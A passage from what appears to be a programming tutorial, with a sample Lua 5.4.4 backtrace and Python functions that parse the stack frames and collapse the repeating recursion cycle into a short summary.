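#6 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#7 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#8 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#9 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#10 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#11 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#12 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
#13 0x55555557e87c in luaG_errormsg /home/eqqie/work/lua-5.4.4/src/ldebug.c:813
#14 0x55555557eb96 in luaG_runerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:829
#15 0x55555557de2a in typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:725
#16 0x55555557de75 in luaG_typeerror /home/eqqie/work/lua-5.4.4/src/ldebug.c:734
#17 0x5555555b612b in luaV_finishget /home/eqqie/work/lua-5.4.4/src/lvm.c:296
#18 0x5555555bd340 in luaV_execute /home/eqqie/work/lua-5.4.4/src/lvm.c:1257
#19 0x5555555835f3 in ccall /home/eqqie/work/lua-5.4.4/src/ldo.c:609
#20 0x5555555836a5 in luaD_callnoyield /home/eqqie/work/lua-5.4.4/src/ldo.c:627
"""

def parse_frames(text):
    """Return (function, "file.c:line") pairs for the first backtrace in text."""
    frames = []
    for raw in text.splitlines():
        m = FRAME_RE.match(raw.strip())
        if not m:
            continue  # header, summary or other non-frame line
        index, func, path, line = m.groups()
        if int(index) != len(frames):
            break  # numbering restarted: a second backtrace begins here
        frames.append((func, f"{path.rsplit('/', 1)[-1]}:{line}"))
    return frames

def find_cycle(frames):
    """Return (start, period) of the earliest repeating frame cycle, or None."""
    n = len(frames)
    for start in range(n):
        # Require two full repetitions; the last one may be cut short.
        for period in range(1, (n - start) // 2 + 1):
            window = range(start, n - period)
            if all(frames[i] == frames[i + period] for i in window):
                return start, period
    return None

def summarize(text):
    """Collapse a recursive backtrace into its unique prefix and one cycle."""
    frames = parse_frames(text)
    found = find_cycle(frames)
    if found is None:
        return {"prefix": frames, "cycle": [], "repeats": 0}
    start, period = found
    return {
        "prefix": frames[:start],
        "cycle": frames[start:start + period],
        "repeats": (len(frames) - start) // period,
    }

if __name__ == "__main__":
    result = summarize(SAMPLE)
    print("prefix:", result["prefix"])
    print("cycle x%d:" % result["repeats"], result["cycle"])
```

On the sample, the prefix is the four frames ending in the `luaE_checkcstack` path, and the cycle is the eight frames from `luaD_callnoyield` through `luaG_errormsg` and `luaV_execute` back to `ccall`.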